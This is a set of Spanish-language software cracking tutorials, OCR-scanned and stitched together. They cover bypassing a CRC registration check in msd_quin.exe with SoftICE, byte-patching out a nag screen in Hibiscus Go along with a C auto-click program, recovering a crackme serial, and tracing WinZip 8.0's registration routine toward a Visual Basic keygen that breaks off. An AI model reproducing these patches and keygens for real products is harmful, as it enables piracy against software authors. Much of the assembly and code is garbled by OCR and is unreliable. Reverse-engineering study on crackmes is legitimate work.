:0001.c1e0 08c0 or al , al 

:0001.cle2 752a jne c20e 


os explico: el programa ha calculado con nuestros datos y nuestra clave mala, una especie de crc (para los que no 
sepais lo que es esto, os diré que el crc es un número de 32 bits que "valida" los datos introducidos). 


ese cre debe coincidir con el que haya calculado con nuestros datos y la clave buena. por eso, (como no van a coincidir 
3)) haremos que coincidan sobre la marcha... 


aquí teneis el procedimiento completo: 


ejecutamos el programa msd_quin.exe 

seleccionamos la opción para registrar el programa e introducimos nuestro nombre. nos dará un n? de serie, lo 
aceptamos. metemos una clave cualquiera y antes de aceptar los datos en el s/n vamos a softice con ctrl+d. 
como queremos 'cazar' al programa para poder manipularlo, metemos el siguiente breakpoint: 


bpint 16 if ah== 


esto hará que volvamos a softice cuando se llame a la int 16 y ah valga 0. esta interrupción es la de teclado y con ah=0 
lo que hace es esperar a que se pulse una tecla. 
volvemos al programa con f5. 


pulsamos la 's' para aceptar los datos y estamos en softice (hemos pulsado una tecla). 
borramos el breakpoint, ya no nos hace falta (bc *) 

vamos a mirar la tabla de interrupciones del dos (que está en 0000:0000) con el comando d 0:0 
veremos algo así: 


0000:0000 xx xx xx xx c5 13 x1 xh xx XX XxX xx Cc5 13 xl xh 


lo que ves son punteros completos (segmento:offsset) a las rutinas de servicio de cada una de las interrupciones 
(empezando por la cero). 

si recordais, el programa capturaba la int 01 y la int 03 y es, precisamente, en la rutina de servicio de esas 
interrupciones (que es la misma) donde está el código que chequea el crc. 

las xx son valores que no nos importan. la dirección que buscamos es: xhx1:13c5. el valor del segmento variará de una 
ejecución a otra, pero el offsset no. 

buscamos a partir de ahí el código que hemos visto arriba... 

empieza en xhxl:15a5: 


:xhx1.15a5 9a87002ald call xxxx:0087 
:xhxl1.1l5aa 8b867eff mov ax, [bp+ff7e] 


metemos un breakpoint aquí: 


bpx xhxl.l5aa 


(una observación: anotaros los valores del crc bueno y malo, es posible que os haga falta luego) 


ejecutamos paso a paso con f8. en ax tenemos el crc-1 bueno. 
otro pasito f8 
estamos en: 


:xXhx1.15ae 3b06dd23 cmp ax, [23dd] 


ahora, si hacemos d xhx1:23dd podemos ver el crc-1 malo. 

con el comando e editamos esa zona de memoria y cambiamos el dato malo por el bueno ;) pulsando intro podremos 
ver que softice nos dice, en el salto siguiente, que no jump, es decir, que la comparación ha sido correcta. y seguimos 
con f8... 


:xhx1.15b2 750e jne 15c2 
:xhx1.15b4 8b867cff mov ax, [bp+ff7c] 


paramos. estamos en: 


:xhx1.15b8 3b06df23 cmp ax, [23df] 


volvemos a editar ese dato cambiando el malo de xhx1:23df por el bueno que está en ax y seguimos con f8... 


:xhx1.15bc 7504 jne 15c2 
:xhx1.15be b000 mov al, 00 
:xhx1.15c0 eb02 jmp 15c4 


cuando esteis en el jmp 15c4 podeis pulsar f5 y volver al programa que estará ¡¡¡ registrado !!! 
salid del programa y volver a ejecutarlo para comprobar que seguís registrados. 


el programa ha grabado nuestros datos (nombre, n* de serie, clave y crc) en un fichero que se llama msd_quin.cfg pero 
encriptados. todos menos el crc. 

si al ejecutar de nuevo el programa os apareciera sin registrar, editais este fichero, buscais el crc malo (que habíais 
apuntado antes) y lo cambiais por el bueno (cuidado con el órden de los bytes). grabais y probad ahora... 


este mismo procedimiento lo podeis usar con el msd_loto.exe. por supuesto, las direcciones cambiarán pero la técnica 
es la misma. 


conclusiones: 


- no hace falta parchear el programa. podeis usar el fichero msd_quin.cfg de alguien registrado. 

- espero que nadie se haya perdido entre tanto byte :) 

- el 'parche' explicado en la sección anterior lo que hacía era saltarse la comprobación del crc a lo bestia. pero, por lo 
visto, no era sufciente. el crc tiene que ser el correcto, si no algunas opciones fallan. 

- un detalle: si se utiliza la técnica del hardpatching y se aplica el parche en el salto final de la rutina de descompresión, 
se puede usar toda la zona de código de dicha rutina para meter nuestros 'arreglos', ya que ese código no se volverá a 
usar. 

- no confundais el crc que chequea la rutina de descompresión del programa con el crc que se calcula a partir de 
nuestros datos de registro. 

- habreis observado que las direcciones que aparecen en los listados de código no coinciden con las que yo os comento 
luego, pero es porque una dirección de memoria se puede escribir con muchas combinaciones de segmento:offsset y 
cada desensamblador elige la que cree más conveniente. pero siempre hablamos de la misma dirección física. 


bueno, y con esto y un bizcocho... 


y SO ; : 1 
recordad: si os haceis millonarios acordaros del pobre crick $ ( 


un saludo. 


p.d.: no soy partidario de crear parcheadores expecíficos, pero aquí teneis la información. 
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Programa para la edición de partidas de Go 


File InsPEctor, TRW2000, Hex Editor 


hibiscus go contiene todas las funciones básicas que pueden esperarse de un buen editor de partidas. el 


programa puede leer y grabar en los dos formatos de juegos más comunes, el formato sgf (smart go format) y 
el llamado formato standard. 


las funciones básicas de hibiscus go son: 


e ingreso de partidas (incluyendo variantes, comentarios, diagramas especiales, etc.) 
e reedición de juegos (con métodos sencillos para avanzar y retroceder) 
e impresión de partidas (incluyendo el formato rtf) 


en principio analizamos el comportamiento del programa para poder conocer las limitaciones que nos impone. 


ni bien corremos el programa nos aparece la siguiente pantalla 


a 


ahora adelantamos la fecha del sistema para que el programa caduque, digamos 70 días. ejecutamos nuevamente el 
programa y nos aparecerá la misma nag screen recordándonos que pasaron 71 días de nuestro período de prueba, 
aunque nos deja contiunuar con su utilización. probamos atrasar el reloj al dia de la instalación y la nag nos recordará 
que han pasado 1 día de la evaluación. evidentemente el autor ha decidido recordarnos solamente, al inicio del 
programa, el tiempo de utilización del mismo sin desarrollar otro tipo de protección por lo que el ataque se basará 


solamente en la eliminación de la esta molesta pantalla que nos obliga a pulsar el botón de ok cada vez que corremos la 
aplicación. 


a partir de ahora podríamos cargar el softice para intentar establecer un punto de ruptura (bpx) en alguna de las 
funciones típicas como messageboxa, createdialogindirectparama, showwindow para luego comprobar que el nag es 
dialogboxparama o realizar un procedimiento mas sencillo mediante el uso de trw2000. 


cargamos el debugger en memoria y luego ejecutamos hibiscus hasta que aparezca la pantalla de bienvenida, luego 
pulsamos ctrl-n para llamar el trw2000 en modo ring 3 (ver la ayuda del programa), tipeamos el comando pmodule y 
damos enter, el debugger nos devolverá automáticamente al nag screen. ahora pulsamos el botón ok y saltará 
nuevamente trw2000 justo en el módulo que llamó a la función, es decir el programa hibiscus. de esta forma nos 
evitamos tener que pulsar repetidamente f12 (como en el caso del softice) hasta alcanzar el mismo punto. podemos ver 
una descripción y ejemplo del poderoso comando pmodule es la sección "test" de la ayuda de trw2000. 


ahora estaremos en la siguiente sección de código: 


:0046ef5e 51 push ecx 

:0046ef5f f£7010 push [eax+10] 

:0046ef62 8b00 mov eax, dword ptr [eax] 
:0046ef64 8b506c mov edx, dword ptr [eax+6c] 
:0046ef67 ££7208 push [edx+08] 


* reference to: user32.dialogboxparama, ord:0000h 


| 

:0046efóa e8bea60200 call 0O049962d 
:0046ef6f 5d pop ebp <==== aqui 
:0046ef70 c3 ret 


comprobamos que realmente es esta la llamada correcta situando un breakpoint en 0046eefóa y corremos nuevamente 
el programa. presionamos f12 y nuestra pantalla aparecerá de inmediato. a partir de aquí reemplazamos eSbea60200 
por 9090909090 (nops) con el propósito de anular la llamada al nag screen para darnos cuenta inmediatamente que 
windows produce un general protection fault (gpf). ¿qué ha pasado?. simple, antes de dicha llamada el puntero de stack 
(esp) contiene un valor distinto al que tiene después que retorna lo que hace que el programa deje de funcionar. para 
solucionar esto deberemos conocer los valores de esp antes y después de la llamada en 0046ef6f. 


con el punto de ruptura ya situado en la línea correspondiente al llamado de a dialogboxparama (en 0046eef6a) 
corremos nuevamente el programa y tipeamos el comando ? esp para averiguar su valor lo que nos devuelve 70fb1c, 
luego pulsamos f10 para que se ejecute la función y consultamos nuevamente el valor de esp que ahora sera 70fb30. la 
diferencia es da 14 (hexadecimal) por lo que deberemos reemplazar: 


e8bea60200 call 0049962d 


que tiene 5 bytes de longitud con: 


:0046ef6a 830414 add esp, 14 ¡para mantener el valor final del stack 
:0046ef6d 44 inc esp ¡incrementa esp 
:0046ef6e 4c dec esp ¡disminuye esp para anular el anterior 


ahora sólo nos queda utilizar cualquier editor hexadecimnal (por ejemplo hiew) para realizar las correcciones antes mencionadas 
y tendremos el programa funcionando sin su pantalla de bienvenida. 


en el supuesto caso de que no desearamos "retocar" el ejecutable todavía nos queda una opción más a través de la creación de un 
programa que simule la pulsación del botón ok tal cual se explica en el excelente turorial "simulating user input to eliminate nag 
screens" por bb. el código fuente en c para realizar esto es: 


ttinclude 
tHinclude 
ttinclude 
char *programa="hibiscus.exe"; 
hwnd mewhwnd,clickithwnd; 


bool callback enummain(hwnd myhwnd, Iparam lparam) 
( 
printf("hwnd principal: %04x11",myhwnd); 
mewhwnd=myhwnd; 
return(false); 


) 


bool callback enumchild(hwnd myhwnd, Iparam lparam) 


( 
char class[200],text[200]; 


getclassname(myhwnd,class,sizeof(class)); 
getwindowtext(myhwnd,text,sizeof(text)); 
1f (Istremp(class,"button") 48 !stremp(text,"ok")) [ 
clickithwnd=myhwnd; 
return(false); 
) 


return(true); 


) 


main(int argc,char **argv) 
( 
startupinfo startinfo; 
process_information procinfo; 


getstartupinfo(Sstartinfo); 
1f ( createprocess(null,programa,null,null,false,normal_priority_class,null, 
null, 8startinfo,ézprocinfo) ==0 ) ( 
fprintf(stderr,"no se pudo crear el proceso"); 
exit(-1); 
) 


waitforinputidle(procinfo.hprocess,2000); 
enumthreadwindows(procinfo.dwthreadid,$enummain,0); 
waitforinputidle(procinfo.hprocess,500); 
enumchildwindows(mewhwnd,éenumchild,0); 
postmessage(clickithwnd,bm_click,0,0); 
) 


este manual ha sido creado sólo con fines educativos y si usted va utilizar este programa por favor pague al autor por el uso del 
mismo. 


sujeto tacito 


stacito hotmail.com 
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Programa: Crackme (id:12) by tC... 


PROTECCION: Serial. 

Objetivo: Encontrar el serial. 

Descripcion: Pues eso. 

Dificultad: Facililla 

DOWNLOAD : http: //welcome.to/karpoff 

Herramientas: Softice, Dede 2.43 

CRACKER: El Pollo FECHA: 29/11/2000 


introduccion 


este es mi primer tutorial. espero que con mis todavia pobres conocimientos y experiencia os ayude en algo a la otra de 
obtener un serial valido para otra aplicacion. 


al atake 


empezamos analizando el fichero con el gettyp o similiares. 


= [c:Xcm_idl2.exe] 
dos executable file - 371712 bytes 


portable executable (starting at 256 for 371456 bytes) 
compiler: borland delphi 4 


calculated entrypoint: 284984 / 00045938h (rva: 00046538h) 

required cpu type: 80386 

requires any version of win32 

flags: 
file is executable 
line numbers stripped from file 
local symbols stripped from file 
32 bit word machine 

linker version: 2.25 

objects (object align = 00001000h): 
name virt size rva phys size phys ofs 
code 00045580h 00001000h 00045600h 00000400h 
data 00000e48h 00047000Kh 00001000h 00045a00h 
bss 000008el1h 00048000hKh 00000000h 00046a00h 
«¡data o0001f08gh 00049000hKh 00002000h 00046a00h 
.tls o0000010h 0004b000hKh 00000000h 00048a00h 
.rdata o0000018h 0004co00h 00000200h 00048a00h 


.reloc 00004ed0h 0004d000h 00005000h 00048c00h 
¿ESC 0000d4000h 00052000h 0000d000h 0004dc00h 


- files identified: 1 of 1 (100.005) 
- total time: 0.0 ms (0.0 ms/file) 


vemos que no esta empaketado porque nos indica que esta compilado con borland delphi 4 (normalmente los que estan 
empaketados no muestran el compilador usado). tampoco esta empaketado porque las virual sizes se corresponden con 
las physical sizes mas el physical offset. 


bueno, a continuacion por estar compilado en delphi lo procesamos con el dede y vemos que solo hay un procedure 
llamado 'unit 1' con 3 events: register1click, exit2click y aboutl click. nos interesa el 1” de los eventos claro esta. 
desensamblamos este fragmento de codigo y obtenemos: 


KKXXXX try 


00446228 64ff30 push dword ptr fs: [l[eax] 
0044622b 648920 mov fs: [eax], esp 
0044622e 8d55fc lea edx, [ebp-$04] 

* reference to control editl : n.a. 

00446231 8b86c4020000 mov eax, [esi+$02c4] 


=> a continuacion lee nuestro serial. 
* reference to: controls.tcontrol.gettext () 


00446237 e814a7fdff call 00423950 
0044623c 8b45fc mov eax, lebp-$04] 


=> calcula su longitud. 
* reference to: system. .dynarraylength () 
| or: system. .lstrlen/() 


0044623f e8b4d8fbftf Call 00403af8 

00446244 a3d4884400 mov dword ptr [$4488d4], eax 

00446249 833dd488440000 cmp dword ptr [$4488d4], +$00 

00446250 0f84ac000000 Az 00446302 <-— si la longitud es O ciao 
00446256 33db xor ebx, ebx 

00446258 43 inc ebx 

00446259 8a55fce lea edx, [ebp-$04] 

* reference to control editl : n.a. 

0044625c 8b86c4020000 mov eax, [esi+$02c4] 


=> y no te lo pierdas lee nuestre nuestro serial un par de veces mas. ¿7? 
* reference to: controls.tcontrol.gettext () 


00446262 e8e9d6fdff Call 00423950 

00446267 8b45fc mov eax, lebp-$04] 

0044626a 0fb64418ff movVZzX eax, byte ptr [eax+tebx-$01] 
0044626f 89049474884400 mov [$448874+ebx*4], eax 
00446276 8a55fce lea edx, [ebp-$04] 

* reference to control editl : n.a. 


00446279 8b86c4020000 mov eax, [esi+502c4] 


* reference to: controls.tcontrol.gettext () 


0044627f e8ccd6fdff call 00423950 
00446284 8b45fc mov eax, lebp-$04] 


* reference to: system. .dynarraylength () 
| or: system. .lstrlen/() 


00446287 e86cd8fbff Call 00403af8 
0044628c 3bd8 cmp ebx, eax 
0044628e 7508 jnz 00446258 


=> alto aqui que ha sonado un tiro. esta funcion que no esta especificada como 
nativa de delphi es muy sospechosa, no crees? y si no los crees te lo digo yo. 
mas tarde la comentaré. 

00446290 e85bfftffff Call 004461f0 

00446295 b8d48884400 mov eax, $004488d8 


* reference to: system. .lstrclr(system.ansistring) 


0044629a e8ddd5fbff Call 0040387c 

0044629f bf12000000 mov edi, $00000012 
004462a4 bbc0884400 mov ebx, $004488c0 
004462a9 8d45f8 lea eax, l[ebp-$08] 
004462ac 8a13 mov dl, byte ptr [ebx] 


=> lleva a cabo todo un proceso que podras comprobar tu mismo que en definitiva 
lo que hace es invertir nuestro serial a base de ir concatenando, pero no el 
serial introducido por el usuario. 

* reference to: system. .lstrfromchar (system.ansistring) 

or: system. .1lstrfromwchar (system.ansistring) 

or: system. .wstrfromchar (system.widestring) 

or: system. .wstrfromwchar (system.widestring) 


004462ae e86dd7fbff Call 00403a20 

004462b3 8b55f8 mov edx, [ebp-$08] 
004462b6 b8d8884400 mov eax, $004488d8 
004462bb 8b0dd8884400 mov ecx, [$4488d8] 


* reference to: system. .lstrcat3() 


004462c1 e8Ted8fbftf Call 00403b44 

004462c6 43 inc ebx 

004462c7 4f dec edi 

00446208 75df jnz 004462a9 

004462ca ald8884400 mov eax, dword ptr [$4488d8] 
* possible string reference to: ':udé”“¿p)idiáuéiloyp+' 

004462cf ba38634400 mov edx, $00446338 


=> momento culminante. compara dos Cadenas de caracteres. cuales seran? 
* reference to: system. .lstrcmp() 

004462d4 e82fda9fbff Call 00403c08 

004462d9 7527 jnz 00446302 


=> si la comparacion es positiva 'yeah you did it!!' o lo que es lo mismo guay. 


* reference to control yeahyoudiditl : n.a. 
004462db 8b86dc020000 mov eax, lesi+$02dc] 
004462el b201 mov dl, $01 


ahora nuestra mision es rapidamente cargar nuestro programa con el softice y 
ponerle un breakpoint en 004462d4 para ver que Cadenas compara y podremos ver 
nuestra Cadena comparada con la buena que nos dara la victoria. si traceas la 
funcion de comparacion entrando con f8 vemos que las 2 Cadenas que se comparan 
estan en eax y en edx que han sido metidos en la pila antes de la llamada a la 
funcion. pues miramos el contenido en memoria que apuntan estos registros y 
vemos Cadenas no visibles o entendibles al ojo humano. es momento de pensar que 
nuestra Cadena no esta ahi siendo comparada, pero ya os adelante que habia una 
funcion que lo que hace es codificar nuestra cadena. bien pues esta funcion 
hace lo siguiente: 


en eax esta nuestra Cadena con el serial introducido y en edx la longitud de 
esta. 


004461f0 8b15d4884400 mov edx, [$4488d4] 
004461f6 85d2 test edx, edx 
004461f8 7e12 jle 0044620c 
004461fa b878884400 mov eax, $00448878 


hace la xor es decir la or exclusiva del primer elemento de la cadena y 3. una 
xor para el que no lo sepa es cambiar devolver un 1 donde los bits comparados 
son distintos y 0 en otro caso, por ejemplo: 


5 en decimal -> 101 en binario 
3 en decimal -> 011 en binario 
6 en decimal -> 110 en binario 
004461ff 833003 xor dword ptr [eax], +$03 


las 2 siguientes instrucciones son equivalentes a multiplicar por 2 el 
elemento. 

00446202 8b08 mov ecx, [eax] 

00446204 0108 add [eax], ecx 


se posicion en el siguiente elemento. 
00446206 83c004 add eax, +$04 


realiza un bucle hasta que haya procesado todos los elementos de nuestro 
serial. 

00446209 la dec edx 

0044620a 75f£3 jnz 004461ff 


llama a la segunda parte de la codificacion de la cadena. | 
0044620c eBafffffff Call 004461c0 
00446211 ES ret 


-> segunda parte de la cadena 


004461c0 23 push ebx 

004461c1 56 push esi 

004461c2 8b0dd4884400 mov ecx, [$4488d4] <- la longitud 
004461c8 85c9 test ecx, ecx 

004461ca 7e20 jle 004461lec 


004461cc be01000000 mov esi, $00000001 


004461d1 b878884400 mov eax, $00448878 
004461d6 baco0884400 mov edx, $004488c0 
004461db 8b18 mov ebx, [eax] 


le suma 8 a un elemento. 
004461dd 83c308 add ebx, +$08 


y le resta el contador del bucle que realiza a nuestra Cadena y lo va guardando 
en otra posicion de memoria apuntada por edx. 


004461e0 2bde sub ebx, esi 
004461e2 88la mov [edx1, bl 
004461e4 46 inc esi 
004461e5 42 inc edx 
004461e6 83c004 add eax, +$04 
004461e9 49 dec ecx 
004461lea 7T5ef jnz 004461db 
004461lec 5e pop esi 
004461led 5b pop ebx 
004461lee c3 ret 


al final tenemos nuestra cadena codificada de la siguiente manera: al valor ascii de cada caracter le aplica una xor con 
3, lo multiplica por 2, le suma 8 y le resta el contador del bucle. 


volvemos a la funcion que realiza la comparacion, esa en la que no se entendia nada, y vemos ahora con mejores ojos 
que nuestra cadena codificada se compara con: 3a d9 c4 c9 ba bf de 7d 44 cf e2 d9 ea 49 d2 dd de 8f. la longitud de 
esta cadena de de 18 caracteres de ahi el nombre del crackme (id 12), ya que 12 en hexadecimal es 18 en decimal. 


en resumen, tenemos que conseguir que la cadena que introduzcamos sea coincidente despues de haber sido codificada 
e invertida en comparacion con la buena. he aqui la ingenieria inversa: 

nuestro 1” caracter ha de ser 8f que aplicandole la codificacion, es decir, sumandole el contador que es 1, restando 8, 
dividiendolo por 2 y haciendole la xor con 3 nos dara el 1? caracter ha introducir que sera 47 en hexadecimal o 71 en 
decimal que equivale a 'g'. para comprobarlo manten la tecla alt presiona y teclea el numero en el teclado decimal 
obtienes el caracter. 


si repites el proceso para toda la cadena a comparar obtendras el serial valido: 


serial: good work cracker! 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: [WinZip0 ver. 8.0 (3105) 


PROTECCION: Name/Registrationt. 
Programa para comprimir y descomprimir archivos en formato ZIP. 
Obtener Registration (Número Serie) válido para registrarnos y 
OBJETIVO: Ñ Ñ 
Crear un Generador de Claves en Visual Basic. 
Dificultad: Novato, Facililla, Media, ETC. 
DOWNLOAD: http: //www.winzip.com 


Herramientas: — [Nunega SoftlIce 4.05, W32Dasm v8.93, Visual Basic 6 


introduccion 


herramienta para comprimir y descomprimir archivos en formato zip. de la empresa winzip computing, inc. copyright 
O 1991-2000. 


antes de comenzar el atake, hay que tener claro, las herramientas que vamos a emplear, en esta "victima" 
emplearemos el maravilloso debugger de numega - softice ver. 4.05, para obtener el ansiado "registration+” o número 
de serie. 


pues, nada vamos al aaaaaattttttaaaacacakkkkkkkkeeeeee 


arrancamos el winzip 8.0 nos aparece la tipica pantalla "thank you for trying winzip! this is a fully functional unregistered 
version for evaluation only ... blah, blah, blah" 


THE ARCHIVE UTILITY FOR WINDOWS 


THANK YOU FOR TRYING WINZIP! 
This 15. a fully functional unregistered version for evaluation use only. 
The registered version does not display this notice. 


You can order the registered version online, by phone. or by mail. 


Immediate online delivery is available from www. winzip. com. 
View Evaluation License Enter Registration Code... 


| understand that | may use WinZip only for evaluation 
purposes, subject to the terms of the Evaluation License, and 
that any other use requires payment of the registration fee. 


pulsamos el botón [enter registration code] nos aparecera una pantalla para introducir los siguientes datos : 


name: 
registration +: 


regresamos al softice (ctrl+d) y ponemos un bp (breakpoint) getdlgitemtexta 'bpx getdlgitemtexta' regresamos a nuestra 
"victima" en este caso el winzip pulsando (ctrl+d), introducimos los datos a registrar: 


name: +erCser'2000 [for the new millennium] 
registration +: 99666699 


Register WinZip 


lf you paid the WinZip registration fee: 


IEyou paid the WinZip registration fee and received a tegistration number from WinZip 
Computing or an authorized reseller, please enter your name and registration number here 
EXBETLY as they appear in the instructions, or click "Help" for additional information. 


If you have not yet paid the WinZip registration fee: 


If you downloaded an evaluation version of WinZip, or if pou received this version oPWirnZip 
ona disk or CD, with a book, or with other hardware or software, and you have not paid the 


WinZip registration fee. you are licensed to use WinZip for evaluation purposes only. Click 
"Continue Unreaistered", or click “Help” for additional information. 


Name: +Ertdser2000 [OR (HE nEw miLLENNIUM] 
Registration + ]39666694 


Cancel Continue Unregistered | Help 


pulsamos el botón [ok] y pantallazo dentro del softice, pulsamos [£12] y aparecemos en el winzip32!.text+6f6d 
¡vamos, a la caza del registration number! 


:00407f6d 111528744700 call [user!getdlgitemtexta] 


:00407f73 


57 


push edi 


<-- name 'd edi' 


pulsamos 'g' para continuar la ejecución (seguimos la pista del registration ++) pulsamos [f12] 


:0040708f 
:00407095 
:00407096 
:0040709a 
:0040709b 
:0040709c 
:004070a1 
:004070aa 
:004070ac 
:004070b3 
:004070b5 
:004070ba 


dentro de la rútina iremos traceando [£10] observando las operaciones que realiza 


:00407b4b 
:00407b4c 
:00407b4e 
:00407b54 
:00407b55 
:00407b56 
:00407b58 
:00407b5f 
:00407b60 
:00407b66 
:00407b69 
:00407b6a 
:00407b6f 


:00407c09 
:00407c0e 
:00407c14 
:00407c15 
:00407c16 
:00407c1b 
:00407c1c 
:00407c21 
:00407c22 
:00407c28 
:00407c29 
:00407c2a 


£f1528744700 
56 
esff780300 
59 

56 
e822790300 


803d78cd480000 


7459 


803da4cd480000 


7459 
eS1bfaftff 
85c0 


55 

Sbec 

S1ec08020000 

53 

56 

3316 

803d78cd48000 
57 

0185492000000 

8d45ec 

50 

6868144600 

es4f9cffff 


e9b3000000 
Sd85cOfeftfff 
50 

57 
e8a9000000 
59 
bes85cOfeffff 
56 

50 
eSd1fc0400 
f7d8 

1bc0 


call [user!getdlgitemtexta] 
push esi 

call 00429699 

pop ecx 

push esi 

call 004296c2 

cmp byte ptr [0048cd78], 00 
jz 004080b2 

cmp byte ptr [0048cda4], 00 
jz 004080b2 

call 00407b4b 


test eax, eax 


push ebp 

mov ebp, esp 

sub esp, 00000208 
push ebx 

push esi 

xor esi, esi 

cmp byte ptr [00474928], 00 
push edi 

jz 00407c07 

lea eax, [ebp-14] 
push eax 

push 0046f460 
call 00401703 


jmp 00407cc1 

lea eax, [ebp-0140] 
push eax 

push edi 

call 00407cc6 

pop ecx 

lea eax, [ebp-0140] 
push esi 

push eax 

call 00457900 

neg eax 

sbb eax, eax 


<-- registration+* 'd esi' 


<-- call hmmmm [f8] 


<-- call n* válido 


si observamos la pantalla de los registros, observaremos los siguientes valores: 


eax=0072f4b8 ebx=00000001 ecx=0072f4b8 edx=0072f4c0 esi=0047d958 
edi=0047d928 ebp=0072f5f8 esp=0072f3e4 eip=00407c28 
es=017f ds=0187 ss=0187 es=0187 fs=2b7f gs=0000 


visualizando la pantalla de datos observaremos que nos aparece un número extraño, este número si lo introducimos nos 
registrara el programa ;)) 


0187:0079£258 00 00 00 00 00 00 00 00-00 00 000000000000 inmccncnncnnenninninoonoonoononnooaconosnos 
0187:0079£268 44 35 45 39 43 33 45 39-00 17 00 00 00 00 2f 0f ETS A AA 
0187:0079£278 0b 00 0d 00 54 05 87 01-00 00 00 00 00 00 97 16 A 


al llamar a la call 00407c16 retorna un n” mágico a la pila y lo pasa como argumento junto con nuestro número a la call 
00407c28 nos devuelve al registro eax=00000001 esto significa que la comparación es ''errónea' = los 2 números no son 
iguales. 


borramos todos los bpx con bc * y ponemos un bp 'bpx 00407c16' pulsamos 'g' y continuamos con la ejecucion 


apareciendonos el mensaje de error ''incomplete or incorrect information''pulsamos el botón [aceptar] del mensaje de 
error y "voilá'' estamos en la call 00407c16 pulsamos [f8] para ir trazeandola paso a paso, y vemos lo siguiente: 


:00407cc6 55 push ebp 

:00407cc7 Sbec mov ebp, esp 

:00407cc9 51 push ecx 

:00407cca 8b4d08 mov ecx, dword ptr [ebp+08] ¡name introducido 

:00407ccd 83651c00 and dword ptr [ebp-04], 00 

:00407cd1 53 push ebx 

:00407cd2 56 push esi 

:00407cd3 8al1 mov dl, [ecx] ¡lee 1” caracter 

:00407cd5 57 push edi ¡guardalo en edi 

:00407cd6 33c0 Xor eax, eax ¡eax =0 

:00407cd8 Sbfl mov esi, ecx ¿copia puntero del name 

:00407cda 331ff xor edi, edi sedi =0 

o $ cálcula la 2” parte del registration+ válido y lo deja en [ebp-04] - --------- 

:00407cde* 84d2 test dl, dl stestea caracter null 

:00407cde 7413 jz 00407cf3 ¿si es null exit 

:00407ce0 660fb6d2 movzx dx, dl ¡extiende caracter a dx 

:00407ce4 Sbdf mov ebx, edi ¿copia contador 

:00407ce6  Ofafda imul ebx, edx ups condor por 
caracter actual 

:00407ce9 0O15dfe add [ebp-04], ebx suttia la 2 partedel 
registration+ 

:00407cec 8a5601 mov dl, [esi+01] ¡siguiente caracter 

:00407cef 47 inc edi ¿contador = contador +1 

:00407cf0 46 inc esi ¡puntero = puntero + 1 

:00407cf1 ebe9 jmp 00407cde ¡“for x=1 to len(name) 


:00407cf3 c705ecd3470001000000 mov dword ptr [0047d3ec], 00000001 


mov esi, ecx 
mov cl, [ecx] 
test cl, cl 

37 00407dle 
MOVZX Cx, cl 
push 00001021 
push ecx 

push eax 


call 00407d3f ¡opera con el caracter actual 


mov cl, [esi+01] 


add esp, 0c 
inc esi 


0fb74dfc movzx ecx, dword ptr [ebp-04] 


add eax, 63 
push ecx 
MOVZX €ax, ax 


push eax 


* possible stringdate ref form data obj -> '%04x %04x" 


:00407cfd Sbfl 
:00407cff 8a09 
:00407d01 84c9 
:00407d03 7419 
:00407d05 660fb6c9 
:00407d09 6821100000 
:00407d0e 51 
:00407d0f 50 
:00407d10 e82a2000000 
:00407d15 8a4de01 
:00407d18 3c40c 
:00407d1b 46 
:00407d1e 

:00407d22 83c063 
:00407d25 51 
:00407d26 0fb7c0 
:00407d29 50 
:00407d2a 6884144600 
:00407d2f ff750c 
:00407d32 e869e20400 
:00407d37 83c410 
:00407d3a Sf 
:00407d3b 5e 
:00407d3c 5b 
:00407d3d c9 
:00407d3e c3 
:00407d1c ebe3 


* referenced by a call at addresses: 


|:00407b8b, :00407c75 
| 

:00407d3f 55 
:00407d40 Sbec 
:00407d42 8b4508 
:00407d45 56 
:00407d46 33c9 
:00407d48 6408 
:00407d4a Sa6d0c 
:00407d4d 5a 
:00407d4e Sbf1 
:00407d50 330 


push 00461484 


push dword ptr [ebp+0c] 


call 00455fa0 
add esp, 10 


pop edi 


pop esi 
pop ebx 


leave 


ret 
jmp 00407401 


(w32dasm893) 


push ebp 

mov ebp, esp 

mov eax, [ebp+08] 
push esi 

XOr ecx, ecx 

push 08 

mov ch, [ebp+0c] 
pop edx 

mov esi, ecx 


xor esi, eax 


¿copia puntero del name 
¡coge 1” caracter 

stestea si es 0 

¿salta a 407dle si lo es 
¡extiende cl a cx 

¿vuelca 1021h y 

sel caracter actual a la pila 
sy eax (la 1” vezeax=0) 


stoma el siguiente caracter de la 
string$ 


¡ajusta puntero de la pila 
¡puntero = puntero + 1 
4 ultimos dig. registration+ 


¿suma 63 a los 4 primeros dig. 
registration+ 


¿vuelca a la pila 


¡extiende los 4 primeros dig. 
registration+ a eax 


¿vuelca eax 


sfunción de concatenación 


;y guardalos como string$ 


slong. máxima $ en hex. 


ssi la 1* parte de registration+ 
tiene más de 4 


¡caract., estos prevaleceran 
sobre la 2” 


¡parte de registration+ de la 
¿cual se suprimiran por izgda. 


¿pasando a los de la 1*? parte del 
registration+ 


sretorna a la call 


¿salta hacia arriba 


:00407d52 66£7c60080 test si, 8000 
:00407d57 7407 Jz 00407460 


como podéis observar la rútina de generación del registrationt es bastante larga, y aquí no está escrita totalmente (el 
resto del traceo lo podéis probar vosotros)). encontrareis que el winzip nos genera otro registration*, a través de la 
función 00407d3f, en mi caso es : 


name : +erOser'2000[for the new millennium] <- name en minúsculas. 
registration+t: 33951299 


codificación key generator en visual basic | 


' nombre: keygenerator winzip 8.0 (3105) 
' autor: +erOser'2000 [for the new millennium] 
' creado: miercoles, noviembre 22,2000 E 12:25:22 pm (vers: 1.0.0000) 
' descripcion: winzip 8.0 (3105) 
private sub textl_change() 
text2.text = registration_key(textl.text) 
end sub 


private function registration_key(byval name as string) as string 
dim partel!, parte2!, c!, x!, n! 
dim keyparte1$, keyparte2$ 
name = trim$(name) 'quitamos blancos 
name = mid$(name, 1, 40) 'restringimos a 40 caracteres 
if len(name) = 0 then 
exit function 
end if 


'registration* se compone de 2 partes, ambas de 4 valores hexadecimales 
Donna HT? parte Henmomnmmnmann - 
for x = 1 to len(name) 

c = asc(mid$(name, x, 1)) 

c=c* £h100 


for n = 1 to 8 'S veces por cada carácter 
if (((c xor partel) mod <h10000) and £<h8000) = 0 then 
'diferencias entre winzip 8.0 £ winzip 7.0 
"winzip 7.0 --> ffffffff = -1 (byte order "intel” dec.) bit 1 izquierda 
"winzip 8.0 --> Saffffff = -166 (byte order "intel" dec.) 
partel = partel and «h5Safffff 
partel = partel * 2 
else 
partel = partel and «h5Safffff 
partel = partel * 2 
'xorea con el número mágico «<h6666 :)) lo teneis que encontar vosotros 
partel = partel xor £h6666 
end if 
ec=c*2 
next n 
